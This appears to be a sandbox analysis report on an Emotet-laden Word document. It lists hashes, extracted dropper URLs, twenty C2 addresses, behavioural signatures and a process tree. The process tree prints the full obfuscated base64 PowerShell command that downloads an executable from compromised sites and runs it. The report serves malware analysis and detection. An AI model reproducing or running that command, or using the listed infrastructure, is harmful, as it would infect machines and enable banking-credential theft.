emotet | 3d5427a07cdecdce3e2943473bf2a141a3eeff0e22919c7b1fe3378aed3d1590

General

Target

SecuriteInfo.com.Exploit.Siggen2.13465.21876.20371.doc
Size

168KB
MD5

7b47c08a4c4f10203169c0c7ceab2170
SHA1

b5b04a8ff3dcd39452cef492f13e86c510fa8131
SHA256

3d5427a07cdecdce3e2943473bf2a141a3eeff0e22919c7b1fe3378aed3d1590
SHA512

26875b4b30d31a63d875b8ddb4b8671e76de16b6725e07d923f499b6bbcaeb6c67ad1ee369d8425862eee33228b36259b5b02a10308e32cd3157e26cfdf38524

Score

10^/10

trojan banker emotet

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://rectificadoscarrion.com/wp-includes/EiQ/

exe.dropper

http://renekok.com/QbWyat/

exe.dropper

http://www.onlinemediadesigns.com/bin/nObh/

exe.dropper

http://renegaderadio.net/haunted/cA5zuC5/

exe.dropper

http://qatifsport.net/t/NbQq254/

Extracted

Family

emotet

C2

73.116.193.136:80

185.94.252.13:443

149.62.173.247:8080

89.32.150.160:8080

185.94.252.12:80

77.90.136.129:8080

83.169.21.32:7080

104.236.161.64:8080

114.109.179.60:80

189.2.177.210:443

68.183.190.199:8080

144.139.91.187:443

185.94.252.27:443

190.181.235.46:80

82.196.15.205:8080

46.28.111.142:7080

181.167.96.215:80

202.62.39.111:80

219.92.13.25:80

191.99.160.58:80

rsa_pubkey.plain

Signatures

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

488 WINWORD.EXE
488 WINWORD.EXE

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powersheLL.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3140	2044	powersheLL.exe

Executes dropped EXE 2 IoCs

Processes:

285.exeKBDES.exe

pid process

2584 285.exe
568 KBDES.exe

pid	process
2584	285.exe
568	KBDES.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

285.exe

description	pid	process	target process
PID 2584 wrote to memory of 568	2584	285.exe	KBDES.exe
PID 2584 wrote to memory of 568	2584	285.exe	KBDES.exe
PID 2584 wrote to memory of 568	2584	285.exe	KBDES.exe

Emotet Payload 4 IoCs

Detects Emotet payload in memory.

Processes:

resource	yara_rule
behavioral2/memory/2584-10-0x0000000000690000-0x000000000069C000-memory.dmp	emotet
behavioral2/memory/2584-10-0x0000000000690000-0x000000000069C000-memory.dmp	emotet
behavioral2/memory/568-13-0x0000000000780000-0x000000000078C000-memory.dmp	emotet
behavioral2/memory/568-13-0x0000000000780000-0x000000000078C000-memory.dmp	emotet

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Drops file in System32 directory 1 IoCs

Processes:

285.exe

description ioc process

File opened for modification C:\Windows\SysWOW64\TimeDateMUICallback\KBDES.exe 285.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\TimeDateMUICallback\KBDES.exe	285.exe

Suspicious use of SetWindowsHookEx 11 IoCs

Processes:

WINWORD.EXE285.exeKBDES.exe

pid	process
488	WINWORD.EXE
488	WINWORD.EXE
488	WINWORD.EXE
488	WINWORD.EXE
488	WINWORD.EXE
488	WINWORD.EXE
488	WINWORD.EXE
488	WINWORD.EXE
488	WINWORD.EXE
2584	285.exe
568	KBDES.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powersheLL.exeKBDES.exe

pid process

3140 powersheLL.exe
3140 powersheLL.exe
3140 powersheLL.exe
568 KBDES.exe
568 KBDES.exe
568 KBDES.exe
568 KBDES.exe
568 KBDES.exe
568 KBDES.exe
Blacklisted process makes network request 1 IoCs

Processes:

powersheLL.exe

flow pid process

27 3140 powersheLL.exe

pid	process
3140	powersheLL.exe
3140	powersheLL.exe
3140	powersheLL.exe
568	KBDES.exe
568	KBDES.exe
568	KBDES.exe
568	KBDES.exe
568	KBDES.exe
568	KBDES.exe

flow	pid	process
27	3140	powersheLL.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powersheLL.exe

description pid process

Token: SeDebugPrivilege 3140 powersheLL.exe

description	pid	process
Token: SeDebugPrivilege	3140	powersheLL.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Siggen2.13465.21876.20371.doc" /o ""
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
- Enumerates system info in registry
PID:488

C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
powersheLL -e JABUAFUATwBPAEYAagBqAGQAPQAnAEoARQBPAFUAUwBkAGUAawAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAARQBDAFUAUgBpAHQAeQBQAGAAUgBvAFQAbwBDAE8AbAAiACAAPQAgACcAdABsAHMAMQAyACwAIAB0AGwAcwAxADEALAAgAHQAbABzACcAOwAkAEMAVQBaAFEAWgB0AHkAYQAgAD0AIAAnADIAOAA1ACcAOwAkAE4ASQBCAEMAQwBvAHMAdgA9ACcASgBPAEYASwBIAHAAdABvACcAOwAkAEcARwBNAEIAUQBiAHkAaQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAQwBVAFoAUQBaAHQAeQBhACsAJwAuAGUAeABlACcAOwAkAFMAQgBDAFMATQBmAG8AZAA9ACcASQBCAFYATABPAG0AcABuACcAOwAkAE4AVwBEAEcATAB4AHIAbwA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwBiAGoAJwArACcAZQBjAHQAJwApACAATgBlAHQALgBXAEUAYgBjAGwASQBFAG4AVAA7ACQATwBaAEQAQQBLAGcAdgBwAD0AJwBoAHQAdABwADoALwAvAHIAZQBjAHQAaQBmAGkAYwBhAGQAbwBzAGMAYQByAHIAaQBvAG4ALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAEUAaQBRAC8AKgBoAHQAdABwADoALwAvAHIAZQBuAGUAawBvAGsALgBjAG8AbQAvAFEAYgBXAHkAYQB0AC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AbwBuAGwAaQBuAGUAbQBlAGQAaQBhAGQAZQBzAGkAZwBuAHMALgBjAG8AbQAvAGIAaQBuAC8AbgBPAGIAaAAvACoAaAB0AHQAcAA6AC8ALwByAGUAbgBlAGcAYQBkAGUAcgBhAGQAaQBvAC4AbgBlAHQALwBoAGEAdQBuAHQAZQBkAC8AYwBBADUAegB1AEMANQAvACoAaAB0AHQAcAA6AC8ALwBxAGEAdABpAGYAcwBwAG8AcgB0AC4AbgBlAHQALwB0AC8ATgBiAFEAcQAyADUANAAvACcALgAiAHMAcABgAGwASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAUwBTAE0AQQBOAG8AYwB1AD0AJwBEAFQARwBGAFoAcABhAHMAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFoATgBaAEkASQBpAG4AaQAgAGkAbgAgACQATwBaAEQAQQBLAGcAdgBwACkAewB0AHIAeQB7ACQATgBXAEQARwBMAHgAcgBvAC4AIgBEAE8AdwBuAGAAbABgAE8AYABBAGQAZgBJAGwAZQAiACgAJABaAE4AWgBJAEkAaQBuAGkALAAgACQARwBHAE0AQgBRAGIAeQBpACkAOwAkAEYAVgBWAFYATgB5AGsAawA9ACcASwBYAEEAVABVAHUAZQBiACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQARwBHAE0AQgBRAGIAeQBpACkALgAiAGwARQBgAE4AZwBUAEgAIgAgAC0AZwBlACAAMwA2ADkANQA3ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBDAFIAYABlAGEAYABUAEUAIgAoACQARwBHAE0AQgBRAGIAeQBpACkAOwAkAFMATgBPAFEAUwB5AGsAagA9ACcAQwBDAEcATABWAGcAawBzACcAOwBiAHIAZQBhAGsAOwAkAFcARQBPAFAARAB2AHIAeAA9ACcASwBZAE0AQQBYAHQAagBhACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEARgBEAFcARABvAG4AaAA9ACcARQBNAEUATgBLAGIAcQBmACcA
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:3140

C:\Users\Admin\285.exe
C:\Users\Admin\285.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:2584

C:\Windows\SysWOW64\TimeDateMUICallback\KBDES.exe
"C:\Windows\SysWOW64\TimeDateMUICallback\KBDES.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EnumeratesProcesses
PID:568

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\285.exe

Download Submit
C:\Users\Admin\285.exe

Download Submit
C:\Windows\SysWOW64\TimeDateMUICallback\KBDES.exe

Download Submit
memory/488-4-0x000001D38DFA1000-0x000001D38DFD1000-memory.dmp

Filesize
192KB

Download
memory/568-11-0x0000000000000000-mapping.dmp

Download
memory/568-13-0x0000000000780000-0x000000000078C000-memory.dmp

Filesize
48KB

Download
memory/2584-10-0x0000000000690000-0x000000000069C000-memory.dmp

Filesize
48KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads